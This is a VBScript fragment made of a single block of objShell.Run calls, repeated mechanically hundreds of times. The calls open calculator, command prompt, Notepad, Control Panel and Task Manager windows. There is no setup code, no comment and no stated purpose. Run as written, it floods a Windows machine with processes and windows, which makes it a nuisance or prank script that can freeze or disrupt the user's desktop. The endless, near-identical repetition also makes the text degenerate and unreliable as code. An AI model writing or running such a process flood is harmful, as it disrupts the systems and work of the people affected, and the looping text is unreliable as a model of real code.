objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
